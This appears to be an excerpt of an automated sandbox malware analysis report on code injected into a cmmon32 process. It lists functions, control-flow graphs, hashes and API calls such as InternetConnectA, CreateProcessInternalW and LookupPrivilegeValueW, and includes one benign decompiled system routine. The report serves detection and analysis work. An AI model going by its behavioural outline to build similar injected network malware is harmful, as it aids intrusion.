                                          • Opcode Fuzzy Hash: a6fe3ca46ba20cccab80a80165209eacdf6717efa73a70dc85e6f7235329a7ab
                                          • Instruction Fuzzy Hash: 9A012CB2905159AFCB10DF99C941AEFBB78EF59210F148188FD58A7205D7709A10CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA9E0 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 127 1ba9e0-1baa16 128 1baa1f-1baa26 127->128 129 1baa1a call 1bb000 127->129 130 1baa28-1baa4e InternetConnectA 128->130 131 1baa4f-1baa55 128->131 129->128
                                          APIs
                                          • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 001BAA48
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ConnectInternet
                                          • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                          • API String ID: 3050416762-1024195942
                                          • Opcode ID: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
                                          • Instruction ID: 7e3a5533b1b6df068cf17ca238a4bbdabb6e16ac89869e3c8615cd0a5bf548f6
                                          • Opcode Fuzzy Hash: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
                                          • Instruction Fuzzy Hash: 0E01E9B2905118AFCB14DF99D941EEF77B8EB48310F154289FE08A7241D670EE10CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA9D5 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 46networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 132 1ba9d5-1baa26 call 1bb000 135 1baa28-1baa4e InternetConnectA 132->135 136 1baa4f-1baa55 132->136
                                          APIs
                                          • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 001BAA48
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ConnectInternet
                                          • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                          • API String ID: 3050416762-1024195942
                                          • Opcode ID: 04b15682783adc5953287e7964513046403e22f8265fd56c5f620c84f478adc8
                                          • Instruction ID: 390e393eca3b77c8e64509c663507b310a5d27d1849493c16ab2cf02e502eafb
                                          • Opcode Fuzzy Hash: 04b15682783adc5953287e7964513046403e22f8265fd56c5f620c84f478adc8
                                          • Instruction Fuzzy Hash: 24015EB2909159AFCB14CF89C941AFFBBB8FF58710F15468DFA18A7241C7309E018BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA970 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 137 1ba970-1ba9b1 call 1bb000 140 1ba9ce-1ba9d4 137->140 141 1ba9b3-1ba9cd InternetOpenA 137->141
                                          APIs
                                          • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 001BA9C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InternetOpen
                                          • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                          • API String ID: 2038078732-3155091674
                                          • Opcode ID: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
                                          • Instruction ID: 196612887e08b3f50c0b954c991da7cf3274c58f742637fc2d62146df1c2c58f
                                          • Opcode Fuzzy Hash: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
                                          • Instruction Fuzzy Hash: 50F019B2901118AF8B14DF98DC419FBB7B8EF48310B048589FE1897201E771AE208BE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001B9070 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 386 1b9070-1b90b2 call 1bbd30 389 1b90b8-1b9108 call 1bbe00 call 1aace0 call 1b4e40 386->389 390 1b918c-1b9192 386->390 397 1b9110-1b9121 Sleep 389->397 398 1b9123-1b9129 397->398 399 1b9186-1b918a 397->399 400 1b912b-1b914c call 1b8c90 398->400 401 1b9153-1b9174 call 1b8ea0 398->401 399->390 399->397 404 1b9151 400->404 405 1b9179-1b917c 401->405 404->405 405->399
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 001B9118
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: 7a610f761d0da1d75e76726c77c53804720eb4ac1e2d24cbc414290cef663861
                                          • Instruction ID: 011d982be9595499d8cdadcfb5479a15323e7da859ab56a2b533c64cea223a6e
                                          • Opcode Fuzzy Hash: 7a610f761d0da1d75e76726c77c53804720eb4ac1e2d24cbc414290cef663861
                                          • Instruction Fuzzy Hash: 8D3190B2900645BBC724DF68C8C6FA7B7B8BB48B00F10841DF62A5B245DB74B551CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001B9066 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 406 1b9066-1b909f 407 1b90ab-1b90b2 406->407 408 1b90a6 call 1bbd30 406->408 409 1b90b8-1b9108 call 1bbe00 call 1aace0 call 1b4e40 407->409 410 1b918c-1b9192 407->410 408->407 417 1b9110-1b9121 Sleep 409->417 418 1b9123-1b9129 417->418 419 1b9186-1b918a 417->419 420 1b912b-1b9151 call 1b8c90 418->420 421 1b9153-1b9174 call 1b8ea0 418->421 419->410 419->417 425 1b9179-1b917c 420->425 421->425 425->419
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 001B9118
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: 826cdb05194b355ed4cee67a829a9a6e8025f6de3ed2abcd61f79cd0d955b71f
                                          • Instruction ID: 92de2445cfcac01e3cfb86100a37b30a59f4935502baf1fc2a7aaff3b0a34783
                                          • Opcode Fuzzy Hash: 826cdb05194b355ed4cee67a829a9a6e8025f6de3ed2abcd61f79cd0d955b71f
                                          • Instruction Fuzzy Hash: 3221C1B1900245BBC714DF69C8C6BABBBB8EF48B00F10801DF62D9B245D774A511CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001B9194 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 426 1b9194-1b9196 427 1b9139-1b914b 426->427 428 1b9198-1b91c8 call 1b4e40 426->428 429 1b9151 427->429 430 1b914c call 1b8c90 427->430 435 1b91ca-1b91e6 call 1bf102 CreateThread 428->435 436 1b91e7-1b91ec 428->436 432 1b9179-1b917c 429->432 430->429 434 1b9186-1b918a 432->434 437 1b918c-1b9192 434->437 438 1b9110-1b9121 Sleep 434->438 438->434 440 1b9123-1b9129 438->440 442 1b912b-1b914c call 1b8c90 440->442 443 1b9153-1b9174 call 1b8ea0 440->443 442->429 443->432
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,001AF040,?,?,00000000), ref: 001B91DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID: net.dll
                                          • API String ID: 2422867632-2431746569
                                          • Opcode ID: cd5eb7ecd627775c10b73552bcf655d97127b41bbced9486e04b50d2bb623821
                                          • Instruction ID: c6905ea1cc8ccd241271c5bb14fa3e5999cdef4f72410748b6b1dfc36ce56a0f
                                          • Opcode Fuzzy Hash: cd5eb7ecd627775c10b73552bcf655d97127b41bbced9486e04b50d2bb623821
                                          • Instruction Fuzzy Hash: AE0197B76852003AD3316A2C9C47FEBB7C8CB91B20F04006DF649AF5C2C7A5A40282A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,001A3AF8), ref: 001BA68D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: .z`
                                          • API String ID: 3298025750-1441809116
                                          • Opcode ID: 7f8c793370861a3867ea0f21020b830a1f4f49ba8d094e6551979b3935a320aa
                                          • Instruction ID: d2dc6277aa115125cb360f2d31b836c7d6a73e77aab32bdf2386e3d31100b3c0
                                          • Opcode Fuzzy Hash: 7f8c793370861a3867ea0f21020b830a1f4f49ba8d094e6551979b3935a320aa
                                          • Instruction Fuzzy Hash: 5FE06DB5600604BFC728DF69DC45EEB77A9EF88750F108658F91D97241C731E804CEA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,001A3AF8), ref: 001BA68D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: .z`
                                          • API String ID: 3298025750-1441809116
                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction ID: 373e9b33c06839b173a08728053cae5bd5f5bfc1725d2c85e210b270191a4d4f
                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction Fuzzy Hash: 7DE012B1200208ABDB18EF99CC49EEB77ACAF88750F018558FA1C5B242C630E9108AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001A8308 Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001A836A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001A838B
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 6d2d7ba688529a4d90529565f00c787c1d1d69bff5816594368b03415aa07572
                                          • Instruction ID: 7fcfcf32a3778f0481176f82b8df6d3415d2eaa163d51c7d32cb68596ffec8cd
                                          • Opcode Fuzzy Hash: 6d2d7ba688529a4d90529565f00c787c1d1d69bff5816594368b03415aa07572
                                          • Instruction Fuzzy Hash: AF01D471A802287BEB21AA948C43FFE7B6C6F51F50F040114FF04BA1C2E7A4A90547E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001A8310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001A836A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001A838B
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                                          • Instruction ID: 7e2ebc9493d0137ab140d763f82bade233e37e3ed17f3627c15652000a902430
                                          • Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                                          • Instruction Fuzzy Hash: FD018471A8022877EB21A6949C43FFE776C6F51F50F044114FF04BA1C2E794B90546E6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001AACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 001AAD52
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction ID: b0863b4b7c99993cf2c92f29f5b8f2c9d95d3032de35936870d22d96513f892b
                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction Fuzzy Hash: 2E015EB9D4020DABDB14EAE4EC42FDDB3789F14308F1041A5E90997241F730EB08CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA6D0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001BA724
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction ID: 6207c4b641f214a51df24072354cdfc66b0cfaae3cdaf88d88c0a278e5160969
                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction Fuzzy Hash: 6101B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA6CD Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001BA724
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: ec10d082dedc3e5f80ead1512d7cdec73c99b8a6525cbf07614119bfcfa5a149
                                          • Instruction ID: 168c41770c9de778a5b772b2532e66718429f1b65619f20083ed46840822ac5c
                                          • Opcode Fuzzy Hash: ec10d082dedc3e5f80ead1512d7cdec73c99b8a6525cbf07614119bfcfa5a149
                                          • Instruction Fuzzy Hash: 7A01FDB2204148AFCB04CF88DC81DEB77ADAF8C314F258258FA4D97252C630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001B91A0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,001AF040,?,?,00000000), ref: 001B91DC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 44df79828bdb06ce49b0c7c5935c5fbd9c065b9174b416c94fabb2ea3e8c47cd
                                          • Instruction ID: 80cc661a7c1b2fb49a30a7c7e3c50ea8aca9f1794f3c45e4a18d8d72ec1372dd
                                          • Opcode Fuzzy Hash: 44df79828bdb06ce49b0c7c5935c5fbd9c065b9174b416c94fabb2ea3e8c47cd
                                          • Instruction Fuzzy Hash: F5E06D733902043AE32065ADAC03FE7B39CDB91B20F55002AFB0DEB2C1D695F80242A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(001B4526,?,001B4C9F,001B4C9F,?,001B4526,?,?,?,?,?,00000000,00000000,?), ref: 001BA64D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction ID: 8fcb90dc60202cf2cae46401bfb1a2a569496fc3d43cff112e5741ecfc5bee68
                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction Fuzzy Hash: F4E012B1200208ABDB14EF99CC41EEB77ACAF88654F118558FA1C5B242C630F9108AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,001AF1C2,001AF1C2,?,00000000,?,?), ref: 001BA7F0
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction ID: 1a72bdfc169caeca1c658b422257f2e17e797c1a9c34319cf547b129b0904d62
                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction Fuzzy Hash: 4CE01AB12002086BDB10DF49CC85EEB37ADAF88650F018154FA0C57241CA30E8108BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001AF6BA Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,001A8D14,?), ref: 001AF6EB
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 52ede49fd32d6eb30e3a2b7ff44ce5cfddb0291d4e702fb4a6f74a76688b7aa1
                                          • Instruction ID: 4aaceeaa8748ae459e82b939d2aca95fabbe2ce2450681a2c0156c3893517c44
                                          • Opcode Fuzzy Hash: 52ede49fd32d6eb30e3a2b7ff44ce5cfddb0291d4e702fb4a6f74a76688b7aa1
                                          • Instruction Fuzzy Hash: 20D05EB76902042EE614FAE4AC17FAB739D6B52744F19407AF509EA1C3DA54D1018564
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001AF6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,001A8D14,?), ref: 001AF6EB
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                          • Instruction ID: ae9e4205f4bdff272605147e70e9df6608f2a5ffb11a6dc0491b4323a1d255c2
                                          • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                          • Instruction Fuzzy Hash: 2ED05E666503042BE610BAA49C03F6632886B55B00F494074F948972C3DA54E4014165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0459967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 0beca5b0276a96b906e552d6a344463005a60b6b81993a3e25c4a2528e14de93
                                          • Instruction ID: 6c2a1e8ae94e857aef5b6090bb3cd6457747166f520163deaffc7d7ad27ea93f
                                          • Opcode Fuzzy Hash: 0beca5b0276a96b906e552d6a344463005a60b6b81993a3e25c4a2528e14de93
                                          • Instruction Fuzzy Hash: 82B02BB18010C0C5FB00E760460871B394077C0300F12C011D1020280A073CD090F1B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 045EFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E045EFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0459CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E045E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E045E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                          0x045efdda
                                          0x045efde2
                                          0x045efde5
                                          0x045efdec
                                          0x045efdfa
                                          0x045efdff
                                          0x045efe0a
                                          0x045efe0f
                                          0x045efe17
                                          0x045efe1e
                                          0x045efe19
                                          0x045efe19
                                          0x045efe19
                                          0x045efe20
                                          0x045efe21
                                          0x045efe22
                                          0x045efe25
                                          0x045efe40

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 045EFDFA
                                          Strings
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 045EFE01
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 045EFE2B
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: 1a04cd88c3ff8acc671ea25296420e4b613a8ef22fef8f8b95571a5c6396112a
                                          • Instruction ID: 903fe4ed506def4b7243de5ee9b5944b594fe89c4ea1a4f2fb5ea6be606c744d
                                          • Opcode Fuzzy Hash: 1a04cd88c3ff8acc671ea25296420e4b613a8ef22fef8f8b95571a5c6396112a
                                          • Instruction Fuzzy Hash: 97F0FC762002017FE6251A86DC01F337B5AFB84774F140354F6185A1D1EA62FC30E6F4
                                          Uniqueness

                                          Uniqueness Score: -1.00%